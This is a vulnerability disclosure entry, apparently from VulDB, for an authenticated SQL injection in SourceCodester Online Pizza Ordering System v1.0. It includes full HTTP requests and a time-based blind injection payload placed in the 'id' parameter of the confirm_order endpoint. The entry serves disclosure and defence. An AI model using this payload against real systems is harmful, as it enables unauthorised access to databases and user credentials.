Submit #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'info

Title	SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'
Description	Affected Software: SourceCodester Online Pizza Ordering System v1.0 https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391 Tested On: Ubuntu Server 22.04.3 LTS Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order Request: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 Affected Parameter: id Proof of Concept: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE) Impact: SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials. Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
User	simon.davis8080 (ID 54983)
Submission	10/05/2023 10:30 (8 months ago)
Moderation	10/05/2023 12:01 (2 hours later)
Status	Accepted
VulDB Entry	241384

◂ Previous Overview Next ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!